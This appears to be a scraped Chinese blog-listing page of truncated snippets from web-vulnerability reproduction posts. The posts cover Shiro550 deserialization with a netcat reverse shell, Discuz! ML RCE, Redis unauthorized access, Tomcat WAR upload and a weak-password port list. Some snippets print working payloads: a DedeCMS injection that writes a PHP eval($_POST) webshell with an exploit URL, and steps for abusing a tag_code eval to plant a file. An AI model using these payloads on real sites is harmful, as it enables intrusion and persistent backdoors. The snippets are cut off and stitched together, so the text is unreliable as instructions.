详细说明:admin/edit_languages.phpelseif ($_REQUEST['act'] == 'edit'){ /* 语言项的路径 */
转载 2023-05-19 14:37:16
228阅读
文章目录Apache Shiro550反序列化(CVE-2016-4437)漏洞复现一、漏洞描述二、漏洞原理三、影响版本四、(1)复现过程-使用ysoserial工具复现0.环境说明1.使用Docker起CVE-2016-4437环境2.使用nc监听本机端口3.将Bash反弹Shell的Code进行Base64加密4.使用ysoserial.jar的JRMP本地监听映射模块5.生成一次性Remem
转载 2024-03-19 14:00:19
381阅读
端口号 漏洞名称21 FTP弱密码22 SSH弱密码139445 smb弱密码23 telnet弱密码3306 mysql弱密码1433 mssql(sql server)弱密码161 snmp默认团体名/弱口令漏洞443 poodle漏洞:ssl3协议禁用3389 ms12-0206379 redis未授权访问873 rsync未授权访问9200 elasticsearch远程命令执行9200
转载 2023-09-28 21:33:32
15阅读
Discuz! ML RCE漏洞 getshell 复现Discuz! ML RCE漏洞 getshell 复现0x00 影响版本Discuz!ML是一个由CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区,漏洞版本如下:Discuz! ML V3.2Discuz! ML V3.3Discuz! ML V3.40x01 环境搭建使用ph
转载 2021-05-04 23:42:03
970阅读
2评论
PHP代码 很傻比的一漏洞    必须开启缓存才能利用     先看代码    book.php    $kd_cachedir = "./cache";     
转载 2011-11-26 15:10:30
705阅读
struts2.1.8.1升级至2.3.28步骤:Apache Struts 2是世界上最流行的Java Web服务器框架之一
原创 2023-05-15 10:35:40
129阅读
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download.php?open=1
转载 精选 2013-06-18 17:09:30
9385阅读
问题文件 admin/tag.inc.php95行 eval($tag_code); 未对用户提交的执行代码tag_code做安全限制1.jpg1.前台注册会员2.进入会员中心,发布一条求购信息信息标题:随意行业分类:随意产品图片:通过审查元素,修改 post[thumb] 的value为?file=tag&action=preview&tag_code=file_put_cont
转载 2017-09-14 15:27:36
2372阅读
Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于
原创 2022-11-14 21:58:57
3475阅读
一、漏洞描述若空灵二、漏洞原理Tomcat支持通过后端部署war文件,因此我terface and the status permission)manager-jmx (jmx
原创 2022-11-14 21:50:11
384阅读
近期漏洞挖掘又有小发现
首先感谢尖刀的兄弟分享此漏洞,感谢好基友@园长MM。漏洞原文链接http://p2j.cn/?p=357,看到只有利用没有漏洞分析,这里简单说一下漏洞触发的流程,大牛勿喷。0x01 漏洞分析漏洞的根源在代码注释中出现换行,导致代码执行,流程如下:0x0101 首先,从 index.php第30行跟入。0x0102 do_config_inc.php的第37行,跟入这个save_config_fil
转载 精选 2015-01-19 16:50:23
1432阅读
1.redis未授权访问定义  Redis是一个C语言编写的基于key-value类型的高效数据库。  Redis可以执行一些操作将数据保存到内存之中(这也是为什么效率这么高的原因)。  同时redis也可以将内存中的数据写入磁盘之中。2.产生redis未授权访问漏洞的原因  主要是因为配置不当,导致此漏洞的产生,导致恶意数据写入内存或者磁盘之中,造成更大的危害  配置不当原因如下:    red
转载 2022-03-06 15:02:00
0阅读
转自t00ls 在搞一个DEDE站的时候,那个是最新版本的在上传图片的时候被加上了万恶的水印,被加上水印之后就这个PP就废了 解决办法: 1、修改后缀为SWF格式,把mediatype 的ID改成2 (1貌似是图片的格式,2是SWF的格式 <form action="/member/uploads_edit.php" method="po
转载 精选 2010-12-17 13:23:20
644阅读
一、Docker介绍Docker 是一个开源的引擎可以轻松地为任何应用创建一个轻
原创 2022-11-14 21:58:58
1622阅读
一、 Jupyter Notebook介绍Jupyter Notebook(此前被称为 IPython notebook)
原创 2022-11-14 21:59:52
1084阅读
由于接触安全时间不多,一些老的getshell方法不是很清楚。这次碰到了个老站,正好学习了一下。 首先这边是用户名可以猜测出来的,因为输入错误的用户名显示用户名不存在,如果存在的话会显示密码错误。 爆破了一下没发现账号可以登陆,因为页面留下了QQ,所以使用了SGK去查了下,得到了个手机号码 猜测可能 ...
转载 2021-10-14 08:57:00
639阅读
2评论
由于接触安全时间不多,一些老的getshell方法不是很清楚。这次碰到了个老站,正好学习了一下。 首先这边是用户名可以猜测出来的,因为输入错误的用户名显示用户名不存在,如果存在的话会显示密码错误。 爆破了一下没发现账号可以登陆,因为页面留下了QQ,所以使用了SGK去查了下,得到了个手机号码 猜测可能 ...
转载 2021-10-14 08:57:00
396阅读
2评论
一个打开:没有背景图了但还是同资产,因为在测试某体育学院的时候是有账户的,所以直接输入那个账户就能进行下一步操作了,但是这个资产无账户,所以我打算去在搜集一...
原创 2023-07-22 11:00:05
56阅读
漏洞无非这么几类,XSS、sql注入、命令执行、上传漏洞、本地包含、远程包含、权限绕过、信息泄露、cookie伪造、CSRF(跨站请求)等。这些漏洞不仅仅是针对PHP语言的,本文只是简单介绍PHP如何有效防止这些漏洞。1.xss + sql注入其中占大头的自然是XSS与SQL注入,对于框架类型或者有公共文件的,建议在公共文件中统一做一次XSS和SQL注入的过滤。用PHP写个过滤函数,可由如下所示:
原创 2021-03-21 11:02:33
423阅读
  • 1
  • 2
  • 3
  • 4
  • 5